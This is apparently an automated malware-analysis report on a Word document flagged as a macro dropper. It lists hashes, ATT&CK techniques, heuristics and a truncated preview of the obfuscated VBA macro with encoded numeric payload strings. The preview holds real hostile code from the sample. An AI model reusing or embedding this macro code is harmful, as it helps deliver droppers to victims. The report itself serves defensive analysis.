Office (OLE) malware analysis — malicious · 5360d4ca4fc87dc1

MALICIOUS

Office (OLE)

214.5 KB Created: 2015-12-13 14:54:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: 2574573c5f7c6b42f38b9d8eefff03ed SHA-1: 2fa157bd59e72da805fbf57647bb5d44e92132b8 SHA-256: 5360d4ca4fc87dc1e384ec4af008f01414ba5d7f3ee3f6741441f7c36d2fef5a

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open auto-execution macro that calls the Shell() function. This indicates the macro is designed to execute arbitrary code, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6378588-0' further supports this dropper functionality. The obfuscated script attempts to reconstruct a URL from concatenated numerical values, but the full URL could not be resolved.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6378588-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6378588-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33524 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	33524 bytes
SHA-256: `4953327ebe9d9a0f2960c41b5599f127e2bf7f6696b0fc2681d96c2d78591283`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function Ij4vga Lib "GxBfDLZ3" Alias "Ts9OACAV5PRySx" (ByVal F1GpezHODjz As String, FB9wgCDlmQLG1 As Long) As Long #Else Private Declare Function Ij4vga lib "GxBfDLZ3" Alias "Ts9OACAV5PRySx"(byval F1GpezHODjz as String, FB9wgCDlmQLG1 as Long ) as Long #End If Sub XZLiggCSvpT() SIn3yQG5VFwNuPZ = 26 On Error Resume Next JW07oXpYvK2pdtW = 63 Dim G0Afc086XbISr As String, PH6viuNpRR() As String, YoXLSGKoWxMiq6qm As Integer T66aWsXm5 = 27 G0Afc086XbISr = G0Afc086XbISr & "173,213,163,129,245,214,2,118,79,14,69,116,119,106,31,17,62,49,64,88,7,55,52,119,50,37,6,122,86,99,103,40,9,69,109,111,46,0,9,50,15,53,96,89,52,76,57,98,83,3,47,40,76,116,62,70,57,6,117,67,38,62,102,63,43,93,114,64,113,119,83,71,112,124,64,86,27,68,50,88,92,41,0,111,52,98,97,85,93,114,65,58,0,56,79,16,88,64,114,42,108,111,115,68,111,106,79,75,3,98,46,42,18,7,32,56,110,104,80,71,127,31,53,22,100,12,120,48,235,247,180,131,177,193,183,146,186,139,137,153,228,250,204,206,251,141,178,169,248,136,197,164,129,140,141,170,208,248,143,208,173,154,162,234,172,133,157,165,172,186,149,203,231,202,162,226,194,213,224,142,131,241,230,214,224,216,231,220,177,216,175,240,195,199,227,158,229,147,197,231,228,224,196,239,212,183,223,239,250,224,245,245,232,222,218,166,155,168,141,186,196,177,207,13" MJokHYN5SsNK65 = 66 G0Afc086XbISr = G0Afc086XbISr & "3,157,149,187,170,138,180,165,150,162,246,224,195,160,136,255,160,253,148,225,205,234,248,183,155,176,157,103,53,32,53,27,82,47,117,35,31,62,67,71,116,51,45,7,123,124,2,94,48,48,45,16,42,54,30,52,46,19,1,12,61,125,114,157,163,222,176,240,240,31,43,3,48,91,40,36,13,14,58,66,92,100,103,82,79,108,83,91,11,0,47,50,57,67,23,115,38,44,20,2,100,49,18,3,13,119,47,37,27,85,63,75,116,91,81,116,108,88,96,108,88,101,90,102,92,69,76,50,29,79,36,3,30,42,16,106,41,27,41,23,63,90,40,67,119,44,82,112,73,98,95,1,57,84,70,106,120,62,75,4,46,0,30,56,126,75,77,41,112,64,80,110,107,34,121,17,120,92,106,105,82,99,105,94,4,35,8,51,15,14,15,201,143,162,189,149,149,235,195,212,248,213,227,193,253,148,141,207,152,249,180,147,158,236,211,219,187,135,168,211,135,241,233,165,181,218,135,140,191,171,153,143,18" LRuNVsptk = 58 G0Afc086XbISr = G0Afc086XbISr & "1,171,206,235,212,180,200,163,150,169,173,149,184,137,128,144,218,230,202,238,205,179,201,211,140,171,211,223,193,190,240,209,232,227,203,148,177,214,209,164,216,170,244,246,240,232,247,242,193,217,223,225,230,196,184,243,222,234,192,199,219,231,187,225,242,229,246,163,128,246,155,244,190,153,133,194,243,142,196,241,193,53,115,119,78,56,98,17,63,49,39,55,61,105,67,84,120,83,120,67,127,111,13,69,79,42,23,42,26,10,56,48,35,39,24,24,109,207,97,111,32,38,109,10,53,25,12,42,10,48,40,41,22,70,113,13,85,99,108,73,87,9,21,17,1,107,83,110,62,46,8,64,51,9,43,22,3,85,119,110,88,97,65,124,70,72,31,98,117,33,27,43,119,69,120,24,100,71,112,88,125,18,111,86,106,83,84,76,16,64,76,72,66,110,73,20,71,95,101,60,25,50,66,113,92,76,95,73,104,90,3,37,22,125,3,23,87,16,68,84,71,121,75,69,22,84,3,33,4,1" LDBuGKY292sNUD0 = 10 G0Afc086XbISr = G0Afc086XbISr & "16,0,100,53,16,106,96,120,5,81,112,225,152,228,166,158,234,166,247,169,247,143,169,170,187,147,194,225,170,241,201,148,213,146,147,182,187,250,156,146,163,214,222,169,162,163,159,130,249,173,165,247,137,171,129,244,131,162,172,195,249,193,133,156,231,153,191,237,134,163,141,178,210,137,166,245,137,174,140,167,200,163,214,135,196,241,203,133,222,196,158,240,142,201,246,211,138,208,170,128,195,222,230,219,252,154,131,145,184,147,216,219,253,137,154,224,204,150,218,183,193,208,167,129,182,131,174,141,239,145,228,198,128,80,101,41,75,62,115,56,93,38,11,50,29,124,22,77,1,54,43,77,102,82,71,97,95,99,31,12,95,121,17,71,123,110,79,85,109,172,228,160,134,218,151,34,101,99,24,79,11,54,79,22,96,62,58,20,28,4,54,115,126,15,103,25,41,104,68,87,12,42,112,2,12 ... (truncated)

SHA-256: 4953327ebe9d9a0f2960c41b5599f127e2bf7f6696b0fc2681d96c2d78591283

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function Ij4vga Lib "GxBfDLZ3" Alias "Ts9OACAV5PRySx" (ByVal F1GpezHODjz As String, FB9wgCDlmQLG1 As Long) As Long
#Else
Private Declare Function Ij4vga lib "GxBfDLZ3" Alias "Ts9OACAV5PRySx"(byval F1GpezHODjz as String, FB9wgCDlmQLG1 as Long ) as Long
#End If
Sub XZLiggCSvpT()
SIn3yQG5VFwNuPZ = 26
On Error Resume Next
JW07oXpYvK2pdtW = 63
Dim G0Afc086XbISr As String, PH6viuNpRR() As String, YoXLSGKoWxMiq6qm As Integer
T66aWsXm5 = 27
G0Afc086XbISr = G0Afc086XbISr & "173,213,163,129,245,214,2,118,79,14,69,116,119,106,31,17,62,49,64,88,7,55,52,119,50,37,6,122,86,99,103,40,9,69,109,111,46,0,9,50,15,53,96,89,52,76,57,98,83,3,47,40,76,116,62,70,57,6,117,67,38,62,102,63,43,93,114,64,113,119,83,71,112,124,64,86,27,68,50,88,92,41,0,111,52,98,97,85,93,114,65,58,0,56,79,16,88,64,114,42,108,111,115,68,111,106,79,75,3,98,46,42,18,7,32,56,110,104,80,71,127,31,53,22,100,12,120,48,235,247,180,131,177,193,183,146,186,139,137,153,228,250,204,206,251,141,178,169,248,136,197,164,129,140,141,170,208,248,143,208,173,154,162,234,172,133,157,165,172,186,149,203,231,202,162,226,194,213,224,142,131,241,230,214,224,216,231,220,177,216,175,240,195,199,227,158,229,147,197,231,228,224,196,239,212,183,223,239,250,224,245,245,232,222,218,166,155,168,141,186,196,177,207,13"
MJokHYN5SsNK65 = 66
G0Afc086XbISr = G0Afc086XbISr & "3,157,149,187,170,138,180,165,150,162,246,224,195,160,136,255,160,253,148,225,205,234,248,183,155,176,157,103,53,32,53,27,82,47,117,35,31,62,67,71,116,51,45,7,123,124,2,94,48,48,45,16,42,54,30,52,46,19,1,12,61,125,114,157,163,222,176,240,240,31,43,3,48,91,40,36,13,14,58,66,92,100,103,82,79,108,83,91,11,0,47,50,57,67,23,115,38,44,20,2,100,49,18,3,13,119,47,37,27,85,63,75,116,91,81,116,108,88,96,108,88,101,90,102,92,69,76,50,29,79,36,3,30,42,16,106,41,27,41,23,63,90,40,67,119,44,82,112,73,98,95,1,57,84,70,106,120,62,75,4,46,0,30,56,126,75,77,41,112,64,80,110,107,34,121,17,120,92,106,105,82,99,105,94,4,35,8,51,15,14,15,201,143,162,189,149,149,235,195,212,248,213,227,193,253,148,141,207,152,249,180,147,158,236,211,219,187,135,168,211,135,241,233,165,181,218,135,140,191,171,153,143,18"
LRuNVsptk = 58
G0Afc086XbISr = G0Afc086XbISr & "1,171,206,235,212,180,200,163,150,169,173,149,184,137,128,144,218,230,202,238,205,179,201,211,140,171,211,223,193,190,240,209,232,227,203,148,177,214,209,164,216,170,244,246,240,232,247,242,193,217,223,225,230,196,184,243,222,234,192,199,219,231,187,225,242,229,246,163,128,246,155,244,190,153,133,194,243,142,196,241,193,53,115,119,78,56,98,17,63,49,39,55,61,105,67,84,120,83,120,67,127,111,13,69,79,42,23,42,26,10,56,48,35,39,24,24,109,207,97,111,32,38,109,10,53,25,12,42,10,48,40,41,22,70,113,13,85,99,108,73,87,9,21,17,1,107,83,110,62,46,8,64,51,9,43,22,3,85,119,110,88,97,65,124,70,72,31,98,117,33,27,43,119,69,120,24,100,71,112,88,125,18,111,86,106,83,84,76,16,64,76,72,66,110,73,20,71,95,101,60,25,50,66,113,92,76,95,73,104,90,3,37,22,125,3,23,87,16,68,84,71,121,75,69,22,84,3,33,4,1"
LDBuGKY292sNUD0 = 10
G0Afc086XbISr = G0Afc086XbISr & "16,0,100,53,16,106,96,120,5,81,112,225,152,228,166,158,234,166,247,169,247,143,169,170,187,147,194,225,170,241,201,148,213,146,147,182,187,250,156,146,163,214,222,169,162,163,159,130,249,173,165,247,137,171,129,244,131,162,172,195,249,193,133,156,231,153,191,237,134,163,141,178,210,137,166,245,137,174,140,167,200,163,214,135,196,241,203,133,222,196,158,240,142,201,246,211,138,208,170,128,195,222,230,219,252,154,131,145,184,147,216,219,253,137,154,224,204,150,218,183,193,208,167,129,182,131,174,141,239,145,228,198,128,80,101,41,75,62,115,56,93,38,11,50,29,124,22,77,1,54,43,77,102,82,71,97,95,99,31,12,95,121,17,71,123,110,79,85,109,172,228,160,134,218,151,34,101,99,24,79,11,54,79,22,96,62,58,20,28,4,54,115,126,15,103,25,41,104,68,87,12,42,112,2,12
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.